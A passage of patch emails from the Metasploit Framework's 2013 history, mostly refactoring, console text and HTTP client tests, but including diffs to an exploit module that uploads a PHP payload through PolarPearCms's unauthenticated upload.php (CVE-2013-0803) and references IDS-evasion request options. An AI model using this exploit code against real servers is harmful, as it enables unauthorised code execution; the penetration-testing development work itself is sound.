lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb From 8cff88efacd9142b5f45dc70f3486caaeff0cb70 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 15:45:55 -0600 Subject: [PATCH 084/139] Change from web ui to community / pro --- lib/msf/ui/console/command_dispatcher/core.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 3d46d196c4..d180c7521e 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2651,14 +2651,14 @@ class Core protected # - # Go_pro methods -- these are used to start and connect to the - # web UI. + # Go_pro methods -- these are used to start and connect to + # Metasploit Community / Pro. def launch_metasploit_browser cmd = "/usr/bin/xdg-open" unless ::File.executable_real? cmd print_warning "Can't figure out your default browser, please visit https://localhost:3790" - print_warning "to start the web UI version of Metasploit." + print_warning "to start Metasploit Community / Pro." return false end svc_log = File.expand_path(File.join(msfbase_dir, ".." , "engine", "prosvc_stdout.log")) @@ -2673,14 +2673,14 @@ class Core really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready if really_started print_line - print_good "The web UI is up and running, connecting with your default browser." + print_good "Metasploit Community / Pro is up and running, connecting now." print_good "If this is your first time connecting, you will be presented with" print_good "a self-signed certificate warning. Accept it to create a new user." select(nil,nil,nil,7) system(cmd, "https://localhost:3790") elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time. print_line - print_warning "For some reason, the web UI didn't start in a timely fashion." + print_warning "For some reason, Community / Pro didn't start in a timely fashion." print_warning "You might want to restart the Metasploit services by typing" print_warning "'service metasploit restart' . Sorry it didn't work out." return false From cbce1bdff28a70cb9b84c6d4e51ac39c3249fc9d Mon Sep 17 00:00:00 2001 From: "J.Townsend" Date: Tue, 26 Feb 2013 00:24:46 +0000 Subject: [PATCH 085/139] update module description This adds the version of wordpress the issue was fixed in to the description --- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 368cb18956..34f5139649 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -19,6 +19,7 @@ class Metasploit3 < Msf::Auxiliary API enabled. By interfacing with the API an attacker can cause the wordpress site to port scan an external target and return results. Refer to the wordpress_pingback_portscanner module. + This issue was fixed in wordpress 3.5.1 }, 'Author' => [ From 181e3c0496e505b030a2abf19011f57056cda4e9 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 19:36:48 -0600 Subject: [PATCH 086/139] Uses normalize_uri --- .../multi/http/polarcms_upload_exec.rb | 25 ++++++++----------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 41cc4f750b..a45cecfd06 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -19,18 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PolarPearCms PHP File Upload Vulnerability', 'Description' => %q{ - This module exploits a file upload vulnerability found in PlarPear CMS + This module exploits a file upload vulnerability found in PlarPear CMS By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => [ - 'Fady Mohamed Osman <@Fady_Osman>' + 'Fady Mohamed Osman' # @Fady_Osman ], 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', 'CVE-2013-0803' ] + [ 'CVE', '2013-0803' ] ], 'Payload' => { @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'JAN 21 2012')) + 'DisclosureDate' => 'Jan 21 2012')) register_options( [ @@ -55,11 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote def check uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - + res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}includes/jquery.uploadify/upload.php" + 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', 'upload.php') }) if not res or res.code != 200 @@ -71,11 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - - upload_dir = datastore['UPLOADDIR'] - upload_dir << '/' if upload_dir[-1,1] != '/' - + + upload_dir = normalize_uri("#{datastore['UPLOADDIR']}/") + peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") - data.add_part("#{uri}includes/jquery.uploadify/", nil, nil, "form-data; name=\"folder\"") + data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}includes/jquery.uploadify/upload.php?folder=#{upload_dir}", + 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) From 08275e8d83e7709683f0ab676387713e963d356e Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 19:48:39 -0600 Subject: [PATCH 087/139] Process.spawn instead of system Per @bturner-r7's comment here: https://github.com/rapid7/metasploit-framework/pull/1514#discussion_r3129535 --- lib/msf/ui/console/command_dispatcher/core.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d180c7521e..c13fc46f88 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2653,7 +2653,9 @@ class Core # # Go_pro methods -- these are used to start and connect to # Metasploit Community / Pro. + # + # Note that this presumes a default port. def launch_metasploit_browser cmd = "/usr/bin/xdg-open" unless ::File.executable_real? cmd @@ -2677,7 +2679,8 @@ class Core print_good "If this is your first time connecting, you will be presented with" print_good "a self-signed certificate warning. Accept it to create a new user." select(nil,nil,nil,7) - system(cmd, "https://localhost:3790") + browser_pid = ::Process.spawn(cmd, "https://localhost:3790") + ::Process.detach(browser_pid) elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time. print_line print_warning "For some reason, Community / Pro didn't start in a timely fashion." From abdcde06cd20f87eef9ab3837461e2789e568c67 Mon Sep 17 00:00:00 2001 From: Joe Rozner Date: Mon, 25 Feb 2013 22:58:26 -0800 Subject: [PATCH 088/139] Fix polarcms_upload_exec exploit --- modules/exploits/multi/http/polarcms_upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index a45cecfd06..b3dc7c338f 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") - data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"") + data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ From c104fa6d979b1eca2bdc960df67544bfb848ed65 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 26 Feb 2013 11:01:16 -0600 Subject: [PATCH 089/139] Add spec and a few fixes for set_uri --- lib/rex/proto/http/client.rb | 4 +- lib/rex/proto/http/client_request.rb | 14 +- .../lib/rex/proto/http/client_request_spec.rb | 184 ++++++++++++++++++ 3 files changed, 195 insertions(+), 7 deletions(-) create mode 100644 spec/lib/rex/proto/http/client_request_spec.rb diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..22ace0507e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -179,7 +179,8 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -222,6 +223,7 @@ class Client opts['vars_get'] ||= {} opts['vars_post'] ||= {} + opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..b5fc283ac8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -26,6 +26,7 @@ class ClientRequest attr_accessor :protocol attr_accessor :query attr_accessor :raw_headers + attr_accessor :ssl attr_accessor :uri attr_accessor :user_agent attr_accessor :vars_get @@ -36,7 +37,7 @@ class ClientRequest def initialize(opts={}) @cgi = opts['cgi'] - @config = opts['client_config'] + @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @@ -50,6 +51,7 @@ class ClientRequest @port = opts['port'] @protocol = opts['proto'] @query = opts['query'] + @ssl = opts['ssl'] || false @raw_headers = opts['raw_headers'] @uri = opts['uri'] @user_agent = opts['agent'] @@ -160,7 +162,7 @@ class ClientRequest end def set_uri - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -179,7 +181,7 @@ class ClientRequest end if (config['uri_full_url']) - url = self.ssl ? "https" : "http" + url = self.ssl ? "https://" : "http://" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") url << uri_str @@ -190,7 +192,7 @@ class ClientRequest end def set_cgi - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -221,7 +223,7 @@ class ClientRequest end def set_encode_uri(str) - a = str + a = str.dup config['uri_encode_count'].times { a = Rex::Text.uri_encode(a, config['uri_encode_mode']) } @@ -229,7 +231,7 @@ class ClientRequest end def set_method - ret = method + ret = method.dup if (config['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb new file mode 100644 index 0000000000..894b5d9792 --- /dev/null +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -0,0 +1,184 @@ +require 'spec_helper' + +require 'rex/proto/http/client_request' + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.config['uri_dir_self_reference'] = true + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" + end + end +end + +shared_context "with no evasions" do + before(:all) do + client_request.config['uri_dir_self_reference'] = false + client_request.config['uri_fake_params_start'] = false + client_request.config['uri_full_url'] = false + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" + end + end +end + +shared_context "with 'uri_full_url'" do + + before(:all) do + client_request.config['uri_full_url'] = true + end + + before(:each) do + client_request.config['vhost'] = host + end + + context "with ipv4 host" do + let(:host) { '192.0.2.1' } + + it_behaves_like "uri_full_url" + end + + context "with ipv6 host" do + let(:host) { '2001:DB8::1' } + #before(:each) do + # client_request.config['vhost'] = "[#{host}]" + #end + + it_behaves_like "uri_full_url" + end + + context "with dns host" do + let(:host) { 'www.example.com' } + + it_behaves_like "uri_full_url" + end + +end + +shared_examples "uri_full_url" do + + it "should have the host in the URI" do + client_request.send(:set_uri).should start_with("http://#{host}/") + end + +end + + +describe Rex::Proto::Http::ClientRequest do + + default_options = { + # All of these should be what you get when you pass in empty + # options, but of course that would make it too easy + 'uri' => '/', + 'method' => "GET", + 'proto' => "HTTP", + 'connection' => "close", + 'version' => "1.1", + 'port' => 80, + } + + [ + [ "with reasonable default options", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + # Yes, vhost is in the config. There is no godly reason why this + # should be so. + 'client_config' => { 'vhost' => 'www.example.com', }, + }), + { + :set_cgi => { :result => "/" }, + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_uri_prepend => { :result => "" }, + :set_uri_append => { :result => "" }, + :set_agent_header => { :result => "User-Agent: Mozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_host_header => { :result => "Host: www.example.com\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo: Bar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo: Bar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo: Bar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, + } + ], + + [ "with header folding", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + 'client_config' => { 'header_folding' => true, } + }), + { + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_agent_header => { :result => "User-Agent:\r\n\tMozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_cookie_header => { :result => "" }, + :set_connection_header => { :result => "Connection:\r\n\tclose\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo:\r\n\tBar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, + } + ], + + [ "with ipv6 host", + default_options.merge({ + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, + } + ], + + [ "with ipv6 host and non-default port", + default_options.merge({ + 'port' => 1234, + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, + } + ] + ].each do |c, opts, expectations| + context c do + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } + + expectations.each do |meth, things| + args = things[:args] || [] + result = things[:result] + describe "##{meth}" do + it "should return #{result.inspect}" do + client_request.send(meth, *args).should == result + end + end + end + + end + end + + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } + + context "with GET paramaters" do + subject(:client_request) { + options_with_params = default_options.merge({ + 'vars_get' => { + 'foo[]' => 'bar', + 'foo[]' => 'baz', + } + }) + Rex::Proto::Http::ClientRequest.new(options_with_params) + } + end + + describe "#set_uri" do + it_behaves_like "with 'uri_full_url'" + it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with no evasions" + end + +end \ No newline at end of file From cae030ccd72bf7065eb9c204cec47fc8fc35258c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:25:37 -0600 Subject: [PATCH 090/139] Whitespace --- .../lib/rex/proto/http/client_request_spec.rb | 86 ++++++++++--------- 1 file changed, 46 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 894b5d9792..c5ac25a5ca 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -1,77 +1,77 @@ require 'spec_helper' - + require 'rex/proto/http/client_request' - + shared_context "with 'uri_dir_self_reference'" do before(:all) do client_request.config['uri_dir_self_reference'] = true end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/./" end end end - + shared_context "with no evasions" do before(:all) do client_request.config['uri_dir_self_reference'] = false client_request.config['uri_fake_params_start'] = false client_request.config['uri_full_url'] = false end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/" end end end - + shared_context "with 'uri_full_url'" do - + before(:all) do client_request.config['uri_full_url'] = true end - + before(:each) do client_request.config['vhost'] = host end - + context "with ipv4 host" do let(:host) { '192.0.2.1' } - + it_behaves_like "uri_full_url" end - + context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do # client_request.config['vhost'] = "[#{host}]" #end - + it_behaves_like "uri_full_url" end - + context "with dns host" do let(:host) { 'www.example.com' } - + it_behaves_like "uri_full_url" end - + end - + shared_examples "uri_full_url" do - + it "should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end - + end - - + + describe Rex::Proto::Http::ClientRequest do - + default_options = { # All of these should be what you get when you pass in empty # options, but of course that would make it too easy @@ -82,16 +82,16 @@ describe Rex::Proto::Http::ClientRequest do 'version' => "1.1", 'port' => 80, } - - [ + + [ [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", # Yes, vhost is in the config. There is no godly reason why this - # should be so. + # should be so. 'client_config' => { 'vhost' => 'www.example.com', }, }), - { + { :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, @@ -106,13 +106,13 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, } ], - + [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", 'client_config' => { 'header_folding' => true, } }), - { + { :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -125,29 +125,29 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, } ], - + [ "with ipv6 host", default_options.merge({ 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, } ], - + [ "with ipv6 host and non-default port", default_options.merge({ - 'port' => 1234, + 'port' => 1234, 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } ] ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } - + expectations.each do |meth, things| args = things[:args] || [] result = things[:result] @@ -157,28 +157,34 @@ describe Rex::Proto::Http::ClientRequest do end end end - + end end - + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } - + context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ + 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', + 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + + it "should contain the params" do + client_request.to_s.should contain("foo[]=bar") + client_request.to_s.should contain("foo[]=baz") + end end - + describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" it_behaves_like "with no evasions" end - -end \ No newline at end of file + +end From 7b3a11f2f99213c00a12c0a8c165d26852ce296b Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:28:44 -0600 Subject: [PATCH 091/139] Axe tests that belong in client_request_spec --- spec/lib/rex/proto/http/client_spec.rb | 90 -------------------------- 1 file changed, 90 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 937130a1f4..0105b11136 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -121,96 +121,6 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) do - - end - - it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) do - - end - - # These set_ methods all exercise the evasion opts, looks like - - it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - - end - - it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do - - end - - it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) do - - end - - it "should set and return the version string", :pending => excuse_lazy(:set_version) do - - end - - it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) do - - end - - it "should set and return the path", :pending => excuse_lazy(:set_path_info) do - - end - - it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) do - - end - - it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) do - - end - - it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) do - - end - - it "should set and return padding after the URI" do - @cli.set_uri_append.should be_empty - end - - it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do - - end - - it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) do - - end - - it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) do - - end - - it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) do - - end - - it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) do - - end - - it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) do - - end - - it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" do - - end - - it "should set and return a formatted header", 